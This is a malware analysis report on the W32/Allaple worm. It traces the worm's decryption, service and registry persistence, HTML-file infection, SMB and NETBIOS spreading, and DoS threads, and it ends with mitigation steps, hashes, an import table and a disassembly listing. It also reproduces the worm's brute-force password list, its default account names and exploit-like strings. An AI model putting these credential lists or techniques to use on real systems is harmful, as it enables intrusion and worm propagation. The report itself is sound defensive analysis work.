MALWARE ANALYSIS NOTES – W32/Allaple

Allaple Worm

A. General function and functionality of the malware

The malware decrypts itself after allocating memory for it and then passes control to the decrypted code in-memory. Post decryption involves importing system functions through an obfuscated interface. This code then installs itself as a service and searches for .htm/.html files in the logical drives assigned on the system, installing a randomly named (9 character) copy of itself in \system32\ directory during each search. It prepends itself to the beginning of each html file it finds with an object code passing a CLSID value which references the malware executable path in the registry. This effectively changes the html files to malware executable starters. Thus repeated copying and registry allocation for each of those copies continues unabated for every html file found.

The next phase involves logging in to usual remote accounts using commonly used weak passwords as a spreading mechanism. This includes LAN, SMB (server Message Block) shares, and potential DDos attacks on two particular websites.

Another payload involves the use of buffer overflow vulnerabilities, which can be assumed given the presence of large repetitive strings, typical in such attacks.

There does not seem to be any destructive payload after investigation. This polymorphic worm/virus (infects html files) seems to have the only goal of spreading as much as possible.

B. Behavioral patterns of the malware

Decryption begins at 401792 (OEP). After a quite long sequence the control is passed with a jmp instruction to the decrypted section at 4017DE. This decrypted section goes for another 2 rounds of decryption which entails a fail-safe mechanism to thwart all basic analysis/ disassembling.

I encounter a typical although basic viral assembler trick to obfuscate manual reversing as in:

clip_image002[4]

A thing needs to be said about the .rdata section, which has no file offset and size values in the section header. So I surmise according to the decryption addresses, that the virtual allocation is done in runtime, where in the empty section addresses are filled with decrypted code. Thus, the .rdata section is used as a container for runtime decryption. The rest of the payloads are deployed from this in-memory code for most of the part.

C. Local system interaction

clip_image004[4]

The malware uses the fs register to enter the TIB offset 30 i.e. the Process Environment Block (PEB). Further, offset C is accessed in the PEB which is the PEB_LDR_DATA structure. Again, offset 1C is accessed in this structure which is the InInitializationOrderModuleList<> structure. This data structure is used to load the imagebase of kernel32.dll.

clip_image006[4]

LoadLibraryExA, GetProcAddress are invoked through global constants which serve as function identifiers while calling the API’s.

E.g. 00405034 68 8E4E0EEC PUSH EC0E4E8E –this value points to LoadLibraryExA,

Call 405290 extracts/invokes the required API functions.

VirtualAlloc, VirtualFreeEx are initialized by preparing the stack frame for invocation. 2000h (131072 bytes) are allocated in memory for the viral code

. clip_image008[4]

More required dlls are linked this way.

The jump thunk table is visible in the decrypted code. From 348112 to 348370.

[all tables given in appendix]

A mutex is created with a seemingly long hardcoded value.

clip_image010[4]

The .mem file from OllyDbg is further analyzed to be a PE file, with its section headers renewed, i.e. the .rdata section now has raw offset/size, and is valid. All other sections have new attributes. It’s essentially a new file now in memory as the unobfuscated and decrypted malware, ready for payloads.

Further a list of new strings are recovered from the hex dump and analyzed. They give very direct references to certain exploits/backdoor potentials. A list of potential (to-be) dropped executables, potentially malicious registry changes, a string of pass-keywords etc. all indicates a totally different executable as a payload. I also conclude that the original string dump from the encrypted malware is either a complementing component or a complete decoy system to fool reversers into thinking it’s a downloader/dialer, as a far less malicious file than it really is.

clip_image012[4]

A new set of cryptographic algorithms are found in the executable dump. Originally there were no detected crypto-signatures.

clip_image014[4]

It concatenates the filename string “irdvxc.exe” to the system directory ~\sytem32\ which indicates the file path to be dropped.

clip_image016[4]

clip_image018[4]

And then copies the parent file to the system32 directory and renames itself to “irdvxc.exe”. This would consist of the first malicious dropped file in the filesystem.

clip_image020[4]

clip_image022[4]

It then proceeds to install ‘irdvxc.exe” in the system folder as a service, using a “/installservice” switch/parameter by concatenating this string first as below;

clip_image024

Register view:

clip_image026

And then proceeds to prepare to start it using the ‘/start’ switch again using string concatenation.

clip_image028

The worm takes a brief sleep of 2000 ms or 2 seconds.

The control then flows to an internal subroutine at 347FF0, where a stack frame is prepared and the next sequence of payload installation continues.

clip_image030

Here, a new process is initiated using the CreateProcessA API as;

clip_image032

The new process is installed as can be verified in task manager.

clip_image034

As expected this is a complete copy of the parent file, and is encrypted/obfuscated with the .rdata section having no raw offset/size (equivalent hashes).

Thus the initial payload involves installing itself as a running process, with preparations to install itself as a service as well.

It accessed these keys before exiting. The ‘irdvxc.exe’ process was still running.

clip_image036

A few patches are made to the virtualization detection routines so that the other payloads get activated. Thereafter, we get a function call at 34900A (some file path manipulation routine), 34911B,3491A3 and 347D14.

These strings come up;

{3ED2D4F1-8C31-030B-F817-29B6C522E670} // a GUID

{%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}” // the format string

These are pushed and a call is made at 3424E0, followed by a call to wsprintfA at 342523, as shown below.

clip_image038

At the call at 342473 a CLSID is created and formatted according to the value given below:

clip_image040

clip_image042

A registry key is created which saves the CLSID value above.

clip_image044

clip_image046

Thus, an HKCR key is created, with the subkey and corresponding value. This is the third payload. ‘tslnkxrcbnzhevrk.exe’ is stored in that CLSID subkey, of length 34 as a zero terminated string.

Another key is set;

clip_image048

HKCR\CLSID\{3ED2D4F1-8C31-030B-F817-29B6C522E670}\LocalServer32 with

“C:\Documents and Settings\norman\Desktopafa3b27802d2ab6a751248dbe32cb62.exe” as the value.

Further patching for flow control and fooling the malware is required (it seems to be very benign in VMWare). I change the control flow to focus to my next section at 346C40;

The parent file path is prepared to start with a ‘/service’ switch. OpenSCManagerA is invoked. According to MSDN, this establishes a connection to the service control manager on the specified computer and opens the specified service control manager database.

This is potential malware behavior in this context. The malware is trying to gain access to the SCM database.

clip_image050

In stack view:

clip_image052

Advapi32.CreateServiceA is invoked and the parameters passed are shown above.

MSDN:”Creates a service object and adds it to the specified service control manager database.”

Thus this payload indicates that the parent malware is being installed as a service with all the required parameters for control and access. The start type parameter indicates that it will run on Windows startup. And all errors are being ignored indicating a stealth motive; so that the user might not be notified of its activities and that the service runs uninterrupted. The access levels are all inclusive meaning unrestricted access, this compromising the system.

The ‘DisplayName’ parameter indicates deception to a victim user as if it was a legitimate service process as – “Network Helper Service”. The ‘ServiceType’ parameter indicates the following: The service can interact with the desktop. It runs in its own process. More patching results in access to another subroutine at 341328. This connects the main thread of a service process to the service control manager, which causes the thread to be the service control dispatcher thread for the calling process.

Then we enter another section where the socket API is invoked.

clip_image054

The parameters indicate that a TCP/IP type IPv4 socket stream connection is being initialized, which is converted to little-endian format.

clip_image056

With specific parameters being retrieved and a connection attempt is made.

clip_image058

At 342750 a separate thread is created and used to pass parameters to ws2_32.dll, to facilitate access to the websites- http://www.starman.ee and http://www.if.ee. This again goes into an infinite loop: this denotes a Dos attempt at these ips. More infected machines would mean a DDos attack.

A buffer overflow exploit is a strong potential here given the presence of exploit strings like-

EMEPEDEBEMEIEPFDFECACACACACACAAA

CKFDENECFDEFFCFGEFFCCACACACACAC

111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111xW4

“Colib for lazy guys” // in the icmp code section.

NETBIOS C$ share is being targeted as is the \\*SMBSERVER\IPC$

Windows 2000 2195, Windows 2000 5.0, PC NETWORK PROGRAM 1.0, MICROSOFT NETWORKS 1.03, MICROSOFT NETWORKS 3.0, LANMAN1.0, LM1.2X002 LANMAN2.1, NT LANMAN 1.0, NT LM 0.12. These indicate the platform (build, revision), protocol, network type and version.

Several ports were seen accessed on UDP (NETBIOS) and TCP (LAN). These ports were not recorded in this session, but the 60’s range showed quite a lot of activity. More analysis could be done regarding the recording of the individual ports. But since they vary from session to session, I chose to stick with the range option.

At 342680;

clip_image060

This object code is written to the beginning of html files, starting from the Local Settings\Temporary Internet Files\ Content.IE5\ <random folder name>\<any file [1].htm>, where from infection spreads to all logical drives assigned in the system.

Following, at 341FF1 we find another access preparation at path;”C:\WINDOWS\system32\kvjwbcen7.dll”

This is another dropped file which is the exact replica of the parent file.

clip_image062

And a value is set to;

HKCR\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32\(Default)

(Of) C:\WINDOWS\system32\kvjwbcen7.dll

This effectively, registers a 32-bit in-process server and specifies the threading model of the apartment the server can run in.

Thus the replication procedure continues using 9 char random names

(“C:\WINDOWS\system32\hskxknle7.dll”)

(“C:\WINDOWS\system32\ececeeww7.dll”)

(“C:\WINDOWS\system32\eqtejetr7.dll”)

(“C:\WINDOWS\system32\tbbeqsjk7.dll”)

(“C:\WINDOWS\system32\heeshken7.dll”)

(“C:\WINDOWS\system32\zbvhjkxk7.dll”)

(“C:\WINDOWS\system32\cczthbje7.dll”)

and the like.

And corresponding registry set values that keep incrementing on each dropped file, keeping the values unique.

“0.0017022”,”3″,”0″,”0″,”2″,”1″,”0″,”HKCR\CLSID\{00000304-0000-0000-C000-000000000046}\InprocServer32\(Default)”

“0.0016413”,”3″,”0″,”0″,”2″,”1″,”0″,”HKCR\CLSID\{00000305-0000-0000-C000-000000000046}\InprocServer32\(Default)”

“0.0016740”,”3″,”0″,”0″,”2″,”1″,”0″,”HKCR\CLSID\{00000306-0000-0000-C000-000000000046}\InprocServer32\(Default)”

“0.0016506”,”3″,”0″,”0″,”2″,”1″,”0″,”HKCR\CLSID\{00000308-0000-0000-C000-000000000046}\InprocServer32\(Default)”

“0.0019505”,”3″,”0″,”0″,”2″,”1″,”0″,”HKCR\CLSID\{00000309-0000-0000-C000-000000000046}\InprocServer32\(Default)”

“0.0017583”,”3″,”0″,”0″,”2″,”1″,”0″,”HKCR\CLSID\{0000030B-0000-0000-C000-000000000046}\InprocServer32\(Default)”

“0.0017439”,”3″,”0″,”0″,”2″,”1″,”0″,”HKCR\CLSID\{00000315-0000-0000-C000-000000000046}\InprocServer32\(Default)”

“0.0016809”,”3″,”0″,”0″,”2″,”1″,”0″,”HKCR\CLSID\{00000316-0000-0000-C000-000000000046}\InprocServer32\(Default)”

This goes in a never ending loop in the main thread. No adddtional threads are created at this stage.

At 341632, HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\MSDisk with value as

“C:\Documents and Settings\norman\Desktopafa3b27802d2ab6a751248dbe32cb62.exe /service”

List of Passwords extracted from the decrypted malware:

test2 password test1 telnet ruler remote random qwerty public private poiuytre passwd oracle nopass nobody newpass network monitor money manager login internet install hello guest default debug database computer coffee backup backdoor anonymous alpha access abc123 system super shadow setup security secure secret 123456789 12345678 1234567 123456 12345 00000000 0000000 000000 00000 server asdfgh

List of default accounts for radmin login:

SUPPORT_388945a0, TelnetClients, HelpAssistant, HelpServicesGroup, TsInternetUser, SQLDebugger, SQLServer, SQLAgentCmdExec, NetShowServices, ASPNET, IUSR,_ , IWAM_, ASPNET, WINS, POP3, vmware, –group, –user, Authors, Admins, Browsers, Guests, Users, Developers, Administrators.

D. Original infection vector and propagation methodology

USB drives, SMB file shares, LAN, radmin logins. Once locally executed it does not need user interaction to spread.

E. Any information concerning development of malware (compiler type, country of origin, author names/handles, etc.)

By parsing the string in the both the dumped file and the parent file, I surmise that the origins could be in the EU- particularly Germany, Sweden and Finland.

The indications include .NLS file references which are National Language Settings files, along with system path names in Deutsche.

F. Mitigation:

I. The analyst recommends killing the process with any name of 9 characters in random sequence.

II. All HKCR\CLSID keys following an incrementing sequence must be deleted.

III. The services must be uninstalled by simply deleting the relevant keys.

IV. Passwords in all default accounts must be reviewed and changed following strong password policies like alphanumeric sequences with special characters of minimum 10 characters, and no dictionary words, or any in the found pass-list.

V. All .htm/.html files in the ‘Locals Settings\Tempor~\Conten.IE5\<all folders> must be cleaned.

VI. The \system32\ folder contains most of the dropped executables in dll format. Since the naming scheme and hash is known-they must all be simply deleted.

VII. SMB, LANMAN and NETBIOS shares must be audited to detect activity trying to communicate to the discovered websites which are supposedly targeted for a DDOS attack.

VIII. A registry cleaner and defragmenter utility is recommended after cleaning. And a rescan of the system for any malware is mandatory, even after cleaning.

Appendix:

I] Identification:

_____________________________________________________________

Name: 0AFA3B27802D2AB6A751248DBE32CB62.bin

Size: 1015808

CRC-32: 332C82E1

MD5: 0AFA3B27802D2AB6A751248DBE32CB62

SHA1: FC2FED6EFBED67FC6C5F481573A6129F18D45D72

Read only: No

Hidden: No

System file: No

Directory: No

Archive: Yes

Symbolic link: No

______________________________________________________________

PE structure information [base data]:

____________________________

Machine: 014C – Intel 386

Number of sections: 0003

Time/Date stamp: 22923B70 (5/18/1988 6:33:36 PM)

Address of entry point: 00001792

Base of code: 00001000

Base of data: 00005000

Image base: 00400000

Section alignment: 00001000

File alignment: 00000200

Sub system: 0002 – Windows graphical user interface (GUI) subsystem

_____PE Sections _____________________________________________

Section VirtSize VirtAddr PhysSize PhysAddr Flags

CRC32 MD5

.text 00003428 00001000 00003600 00000400 60000020

805D7C21 CCFC80BA411E1E02C54C415D292708ED

.rdata 00010000 00005000 00000000 00000000 C0000080

.data 0000A489 00015000 0000A600 00003A00 C0000040

1EC02E9E B4DC9B51C4845D74DF3B69497F9CD03A

_____________________________________________________________

II] The complete import table:

00348112 -FF25 90313500 JMP DWORD PTR DS:[353190] ; user32.wsprintfA

00348118 -FF25 8C313500 JMP DWORD PTR DS:[35318C] ; user32.CharLowerA

0034811E -FF25 0C313500 JMP DWORD PTR DS:[35310C] ; kernel32.CloseHandle

00348124 -FF25 08313500 JMP DWORD PTR DS:[353108] ; kernel32.CopyFileA

0034812A -FF25 04313500 JMP DWORD PTR DS:[353104] ; kernel32.CreateEventA

00348130 -FF25 38313500 JMP DWORD PTR DS:[353138] ; kernel32.CreateFileA

00348136 -FF25 34313500 JMP DWORD PTR DS:[353134] ; kernel32.CreateFileMappingA

0034813C -FF25 30313500 JMP DWORD PTR DS:[353130] ; kernel32.CreateMutexA

00348142 -FF25 2C313500 JMP DWORD PTR DS:[35312C] ; kernel32.CreateProcessA

00348148 -FF25 28313500 JMP DWORD PTR DS:[353128] ; kernel32.CreateThread

0034814E -FF25 24313500 JMP DWORD PTR DS:[353124] ; kernel32.DeleteFileA

00348154 -FF25 20313500 JMP DWORD PTR DS:[353120] ; ntdll.RtlEnterCriticalSection

0034815A -FF25 1C313500 JMP DWORD PTR DS:[35311C] ; kernel32.ExitProcess

00348160 -FF25 18313500 JMP DWORD PTR DS:[353118] ; kernel32.ExitThread

00348166 -FF25 14313500 JMP DWORD PTR DS:[353114] ; kernel32.FindClose

0034816C -FF25 B0303500 JMP DWORD PTR DS:[3530B0] ; kernel32.FindFirstFileA

00348172 -FF25 AC303500 JMP DWORD PTR DS:[3530AC] ; kernel32.FindNextFileA

00348178 -FF25 EC303500 JMP DWORD PTR DS:[3530EC] ; kernel32.FlushViewOfFile

0034817E -FF25 A4303500 JMP DWORD PTR DS:[3530A4] ; kernel32.GetCommandLineW

00348184 -FF25 B4303500 JMP DWORD PTR DS:[3530B4] ; kernel32.GetCurrentProcess

0034818A -FF25 64303500 JMP DWORD PTR DS:[353064] ; kernel32.GetCurrentProcessId

00348190 -FF25 54303500 JMP DWORD PTR DS:[353054] ; kernel32.GetDriveTypeA

00348196 -FF25 58303500 JMP DWORD PTR DS:[353058] ; kernel32.GetFileSize

0034819C -FF25 5C303500 JMP DWORD PTR DS:[35305C] ; ntdll.RtlGetLastWin32Error

003481A2 -FF25 60303500 JMP DWORD PTR DS:[353060] ; kernel32.GetLogicalDriveStringsA

003481A8 -FF25 68303500 JMP DWORD PTR DS:[353068] ; kernel32.GetModuleFileNameA

003481AE -FF25 6C303500 JMP DWORD PTR DS:[35306C] ; kernel32.GetModuleHandleA

003481B4 -FF25 70303500 JMP DWORD PTR DS:[353070] ; kernel32.GetProcAddress

003481BA -FF25 74303500 JMP DWORD PTR DS:[353074] ; kernel32.GetSystemDirectoryA

003481C0 -FF25 78303500 JMP DWORD PTR DS:[353078] ; kernel32.GetTickCount

003481C6 -FF25 7C303500 JMP DWORD PTR DS:[35307C] ; kernel32.GetVersionExA

003481CC -FF25 80303500 JMP DWORD PTR DS:[353080] ; kernel32.InitializeCriticalSection

003481D2 -FF25 84303500 JMP DWORD PTR DS:[353084] ; kernel32.InterlockedDecrement

003481D8 -FF25 88303500 JMP DWORD PTR DS:[353088] ; kernel32.InterlockedIncrement

003481DE -FF25 8C303500 JMP DWORD PTR DS:[35308C] ; kernel32.IsBadReadPtr

003481E4 -FF25 90303500 JMP DWORD PTR DS:[353090] ; ntdll.RtlLeaveCriticalSection

003481EA -FF25 94303500 JMP DWORD PTR DS:[353094] ; kernel32.LoadLibraryA

003481F0 -FF25 98303500 JMP DWORD PTR DS:[353098] ; kernel32.LocalAlloc

003481F6 -FF25 9C303500 JMP DWORD PTR DS:[35309C] ; kernel32.LocalFree

003481FC -FF25 A0303500 JMP DWORD PTR DS:[3530A0] ; kernel32.MapViewOfFile

00348202 -FF25 44313500 JMP DWORD PTR DS:[353144] ; kernel32.OpenFileMappingA

00348208 -FF25 A8303500 JMP DWORD PTR DS:[3530A8] ; kernel32.ReadFile

0034820E -FF25 3C313500 JMP DWORD PTR DS:[35313C] ; kernel32.ResumeThread

00348214 -FF25 40313500 JMP DWORD PTR DS:[353140] ; kernel32.SetErrorMode

0034821A -FF25 10313500 JMP DWORD PTR DS:[353110] ; kernel32.SetEvent

00348220 -FF25 B8303500 JMP DWORD PTR DS:[3530B8] ; kernel32.SetFileAttributesA

00348226 -FF25 BC303500 JMP DWORD PTR DS:[3530BC] ; kernel32.SetFilePointer

0034822C -FF25 C0303500 JMP DWORD PTR DS:[3530C0] ; kernel32.SetThreadPriority

00348232 -FF25 C4303500 JMP DWORD PTR DS:[3530C4] ; kernel32.Sleep

00348238 -FF25 C8303500 JMP DWORD PTR DS:[3530C8] ; kernel32.SuspendThread

0034823E -FF25 CC303500 JMP DWORD PTR DS:[3530CC] ; kernel32.TerminateProcess

00348244 -FF25 D0303500 JMP DWORD PTR DS:[3530D0] ; kernel32.UnmapViewOfFile

0034824A -FF25 D4303500 JMP DWORD PTR DS:[3530D4] ; kernel32.VirtualAlloc

00348250 -FF25 D8303500 JMP DWORD PTR DS:[3530D8] ; kernel32.VirtualFree

00348256 -FF25 DC303500 JMP DWORD PTR DS:[3530DC] ; kernel32.WaitForSingleObject

0034825C -FF25 E0303500 JMP DWORD PTR DS:[3530E0] ; kernel32.WideCharToMultiByte

00348262 -FF25 E4303500 JMP DWORD PTR DS:[3530E4] ; kernel32.WriteFile

00348268 -FF25 E8303500 JMP DWORD PTR DS:[3530E8] ; kernel32.lstrcatA

0034826E -FF25 48313500 JMP DWORD PTR DS:[353148] ; kernel32.lstrcmpA

00348274 -FF25 F0303500 JMP DWORD PTR DS:[3530F0] ; kernel32.lstrcmpiA

0034827A -FF25 F4303500 JMP DWORD PTR DS:[3530F4] ; kernel32.lstrcpyA

00348280 -FF25 F8303500 JMP DWORD PTR DS:[3530F8] ; kernel32.lstrcpynA

00348286 -FF25 FC303500 JMP DWORD PTR DS:[3530FC] ; kernel32.lstrlenA

0034828C -FF25 00313500 JMP DWORD PTR DS:[353100] ; kernel32.lstrlenW

00348292 -FF25 04303500 JMP DWORD PTR DS:[353004] ; MSVCRT.memset

00348298 -FF25 00303500 JMP DWORD PTR DS:[353000] ; MSVCRT.strstr

0034829E -FF25 4C303500 JMP DWORD PTR DS:[35304C] ; imagehlp.CheckSumMappedFile

003482A4 -FF25 68313500 JMP DWORD PTR DS:[353168] ; ole32.CoCreateGuid

003482AA -FF25 64313500 JMP DWORD PTR DS:[353164] ; ole32.CoInitialize

003482B0 -FF25 70313500 JMP DWORD PTR DS:[353170] ; ole32.CoRegisterClassObject

003482B6 -FF25 60313500 JMP DWORD PTR DS:[353160] ; ole32.CoTaskMemAlloc

003482BC -FF25 5C313500 JMP DWORD PTR DS:[35315C] ; ole32.CoTaskMemFree

003482C2 -FF25 78313500 JMP DWORD PTR DS:[353178] ; shell32.CommandLineToArgvW

003482C8 -FF25 20303500 JMP DWORD PTR DS:[353020] ; ADVAPI32.CryptAcquireContextA

003482CE -FF25 1C303500 JMP DWORD PTR DS:[35301C] ; ADVAPI32.CryptGenRandom

003482D4 -FF25 18303500 JMP DWORD PTR DS:[353018] ; ADVAPI32.CryptReleaseContext

003482DA -FF25 44303500 JMP DWORD PTR DS:[353044] ; ADVAPI32.RegCloseKey

003482E0 -FF25 14303500 JMP DWORD PTR DS:[353014] ; ADVAPI32.RegCreateKeyA

003482E6 -FF25 24303500 JMP DWORD PTR DS:[353024] ; ADVAPI32.RegDeleteValueA

003482EC -FF25 28303500 JMP DWORD PTR DS:[353028] ; ADVAPI32.RegEnumKeyExA

003482F2 -FF25 2C303500 JMP DWORD PTR DS:[35302C] ; ADVAPI32.RegOpenKeyA

003482F8 -FF25 30303500 JMP DWORD PTR DS:[353030] ; ADVAPI32.RegOpenKeyExA

003482FE -FF25 34303500 JMP DWORD PTR DS:[353034] ; ADVAPI32.RegQueryValueA

00348304 -FF25 38303500 JMP DWORD PTR DS:[353038] ; ADVAPI32.RegSetValueA

0034830A -FF25 3C303500 JMP DWORD PTR DS:[35303C] ; ADVAPI32.RegSetValueExA

00348310 -FF25 40303500 JMP DWORD PTR DS:[353040] ; ADVAPI32.SetServiceStatus

00348316 -FF25 C8313500 JMP DWORD PTR DS:[3531C8] ; ws2_32.WSAGetLastError

0034831C -FF25 C4313500 JMP DWORD PTR DS:[3531C4] ; ws2_32.WSAStartup

00348322 -FF25 C0313500 JMP DWORD PTR DS:[3531C0] ; ws2_32.closesocket

00348328 -FF25 BC313500 JMP DWORD PTR DS:[3531BC] ; ws2_32.connect

0034832E -FF25 B8313500 JMP DWORD PTR DS:[3531B8] ; ws2_32.gethostbyname

00348334 -FF25 B4313500 JMP DWORD PTR DS:[3531B4] ; ws2_32.ntohl

0034833A -FF25 AC313500 JMP DWORD PTR DS:[3531AC] ; ws2_32.ntohs

00348340 -FF25 A4313500 JMP DWORD PTR DS:[3531A4] ; ws2_32.inet_addr

00348346 -FF25 D4313500 JMP DWORD PTR DS:[3531D4] ; ws2_32.inet_ntoa

0034834C -FF25 A0313500 JMP DWORD PTR DS:[3531A0] ; ws2_32.ioctlsocket

00348352 -FF25 98313500 JMP DWORD PTR DS:[353198] ; ws2_32.recv

00348358 -FF25 9C313500 JMP DWORD PTR DS:[35319C] ; ws2_32.select

0034835E -FF25 A8313500 JMP DWORD PTR DS:[3531A8] ; ws2_32.send

00348364 -FF25 CC313500 JMP DWORD PTR DS:[3531CC] ; ws2_32.setsockopt

0034836A -FF25 D0313500 JMP DWORD PTR DS:[3531D0] ; ws2_32.shutdown

00348370 -FF25 B0313500 JMP DWORD PTR DS:[3531B0] ; ws2_32.socket

III] VirusTotal Scan Results:

AhnLab-V3 2010.09.21.01 2010.09.21 Win-Trojan/Starman.Gen

AntiVir 8.2.4.60 2010.09.21 TR/Dropper.Gen

Antiy-AVL 2.0.3.7 2010.09.22 Worm/Win32.Allaple.gen

Authentium 5.2.0.5 2010.09.22 W32/EmailWorm.AMV

Avast 4.8.1351.0 2010.09.21 Win32:Allaple

Avast5 5.0.594.0 2010.09.21 Win32:Allaple

AVG 9.0.0.851 2010.09.22 Worm/Allaple.D

BitDefender 7.2 2010.09.22 Win32.Worm.Allaple.Gen

CAT-QuickHeal 11.00 2010.09.21 I-Worm.Allaple.gen

ClamAV 0.96.2.0-git 2010.09.21 Worm.Allaple-306

Comodo 6158 2010.09.22 NetWorm.Win32.Allaple.GEN

DrWeb 5.0.2.03300 2010.09.22 Trojan.Starman

Emsisoft 5.0.0.37 2010.09.22 Net-Worm.Win32.Allaple.b!IK

eSafe 7.0.17.0 2010.09.21 –

eTrust-Vet 36.1.7869 2010.09.21 Win32/Mallar

F-Prot 4.6.2.117 2010.09.21 W32/EmailWorm.AMV

F-Secure 9.0.15370.0 2010.09.22 Net-Worm:W32/Allaple.gen!B

Fortinet 4.1.143.0 2010.09.21 W32/Allaple.gen!tr

GData 21 2010.09.22 Win32.Worm.Allaple.Gen

Ikarus T3.1.1.88.0 2010.09.22 Net-Worm.Win32.Allaple.b

Jiangmin 13.0.900 2010.09.21 Worm/Allaple.Gen

K7AntiVirus 9.63.2572 2010.09.21 EmailWorm

Kaspersky 7.0.0.125 2010.09.22 Net-Worm.Win32.Allaple.d

McAfee 5.400.0.1158 2010.09.22 W32/RAHack

McAfee-GW-Edition 2010.1C 2010.09.22 W32/RAHack

Microsoft 1.6201 2010.09.22 Worm:Win32/Allaple.A

NOD32 5468 2010.09.21 Win32/Allaple

Norman 6.06.06 2010.09.21 Allaple.QJK

nProtect 2010-09-22.01 2010.09.22 –

Panda 10.0.2.7 2010.09.21 W32/Rahack.gen.worm

PCTools 7.0.3.5 2010.09.22 Malware.Rahack

Prevx 3.0 2010.09.22 High Risk Worm

Rising 22.66.00.07 2010.09.21 Worm.Win32.Allaple.a

Sophos 4.57.0 2010.09.22 W32/Allaple-F

Sunbelt 6909 2010.09.22 Net-Worm.Win32.Allaple.gen (v)

SUPERAntiSpyware 4.40.0.1006 2010.09.22 –

Symantec 20101.1.1.7 2010.09.22 W32.Rahack.H

TheHacker 6.7.0.0.027 2010.09.21 W32/RAHack.gen

TrendMicro 9.120.0.1004 2010.09.21 WORM_ALLAPLE.IK

TrendMicro-HouseCall 9.120.0.1004 2010.09.22 WORM_ALLAPLE.IK

VBA32 3.12.14.1 2010.09.21 OScope.Malware-Cryptor.Win32.Allaple

ViRobot 2010.8.31.4017 2010.09.22 Worm.Win32.Allaple.Gen

VirusBuster 12.65.18.3 2010.09.22 Worm.Akbot.Gen

Additional information

MD5 : 2e15ee1cb958b847a575ea793152ea1c

SHA1 : 680bfa7113afb57509e775d75b35442b53015806

SHA256: ea8edb2cd7c68b971d66ede25cac2346dc0f3713fa436b175de930a649cb341d

IV] The mal code main section:

00347A15 55 PUSH EBP

00347A16 8BEC MOV EBP,ESP

00347A18 83C4 F0 ADD ESP,-10

00347A1B 57 PUSH EDI

00347A1C 56 PUSH ESI

00347A1D 53 PUSH EBX

00347A1E E8 CD040000 CALL 00347EF0

00347A23 68 40BA3500 PUSH 35BA40

00347A28 68 79473500 PUSH 354779 ; ASCII “-embedding”

00347A2D E8 CE95FFFF CALL 00341000

00347A32 83F8 01 CMP EAX,1

00347A35 75 05 JNZ SHORT 00347A3C

00347A37 E8 F4010000 CALL 00347C30

00347A3C 68 0E453500 PUSH 35450E ; ASCII “jhdgcjhasgdc09890gjasgcjhg2763876uyg3fhg”

00347A41 6A 01 PUSH 1

00347A43 6A 00 PUSH 0

00347A45 E8 F2060000 CALL 0034813C ; JMP to kernel32.CreateMutexA

00347A4A A3 C4BB3500 MOV DWORD PTR DS:[35BBC4],EAX

00347A4F E8 48070000 CALL 0034819C ; JMP to ntdll.RtlGetLastWin32Error

00347A54 0BC0 OR EAX,EAX

00347A56 74 12 JE SHORT 00347A6A

00347A58 FF35 C4BB3500 PUSH DWORD PTR DS:[35BBC4]

00347A5E E8 BB060000 CALL 0034811E ; JMP to kernel32.CloseHandle

00347A63 6A 00 PUSH 0

00347A65 E8 F0060000 CALL 0034815A ; JMP to kernel32.ExitProcess

00347A6A 6A 0C PUSH 0C

00347A6C E8 45080000 CALL 003482B6 ; JMP to ole32.CoTaskMemAlloc

00347A71 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX

00347A74 8BF0 MOV ESI,EAX

00347A76 6A 00 PUSH 0

00347A78 6A 00 PUSH 0

00347A7A 6A 00 PUSH 0

00347A7C 6A 00 PUSH 0

00347A7E E8 A7060000 CALL 0034812A ; JMP to kernel32.CreateEventA

00347A83 8906 MOV DWORD PTR DS:[ESI],EAX

00347A85 BF 01000000 MOV EDI,1

00347A8A 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]

00347A8D 50 PUSH EAX

00347A8E 6A 01 PUSH 1

00347A90 6A 00 PUSH 0

00347A92 68 A0303400 PUSH 3430A0

00347A97 6A 00 PUSH 0

00347A99 6A 00 PUSH 0

00347A9B E8 A8060000 CALL 00348148 ; JMP to kernel32.CreateThread

00347AA0 8946 08 MOV DWORD PTR DS:[ESI+8],EAX

00347AA3 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]

00347AA6 50 PUSH EAX

00347AA7 6A 01 PUSH 1

00347AA9 FF75 F8 PUSH DWORD PTR SS:[EBP-8]

00347AAC 68 207B3400 PUSH 347B20

00347AB1 6A 00 PUSH 0

00347AB3 6A 00 PUSH 0

00347AB5 E8 8E060000 CALL 00348148 ; JMP to kernel32.CreateThread

00347ABA 50 PUSH EAX

00347ABB E8 5E060000 CALL 0034811E ; JMP to kernel32.CloseHandle

00347AC0 BF 04000000 MOV EDI,4

00347AC5 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]

00347AC8 50 PUSH EAX

00347AC9 57 PUSH EDI

00347ACA 6A 00 PUSH 0

00347ACC 68 50273400 PUSH 342750

00347AD1 6A 00 PUSH 0

00347AD3 6A 00 PUSH 0

00347AD5 E8 6E060000 CALL 00348148 ; JMP to kernel32.CreateThread

00347ADA 8946 04 MOV DWORD PTR DS:[ESI+4],EAX

00347ADD 6A FF PUSH -1

00347ADF FF35 DCBB3500 PUSH DWORD PTR DS:[35BBDC]

00347AE5 E8 6C070000 CALL 00348256 ; JMP to kernel32.WaitForSingleObject

00347AEA 833D C0BB3500 00 CMP DWORD PTR DS:[35BBC0],0

00347AF1 74 1C JE SHORT 00347B0F

00347AF3 6A 01 PUSH 1

00347AF5 6A 00 PUSH 0

00347AF7 E8 749AFFFF CALL 00341570

00347AFC 68 E8030000 PUSH 3E8

00347B01 E8 2C070000 CALL 00348232 ; JMP to kernel32.Sleep

00347B06 6A 04 PUSH 4

00347B08 6A 00 PUSH 0

00347B0A E8 619AFFFF CALL 00341570

00347B0F 6A 00 PUSH 0

00347B11 E8 44060000 CALL 0034815A ; JMP to kernel32.ExitProcess

00347B16 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347B1D 8D49 00 LEA ECX,DWORD PTR DS:[ECX]

00347B20 55 PUSH EBP

00347B21 8BEC MOV EBP,ESP

00347B23 83C4 F0 ADD ESP,-10

00347B26 57 PUSH EDI

00347B27 56 PUSH ESI

00347B28 53 PUSH EBX

00347B29 68 C8000000 PUSH 0C8

00347B2E E8 FF060000 CALL 00348232 ; JMP to kernel32.Sleep

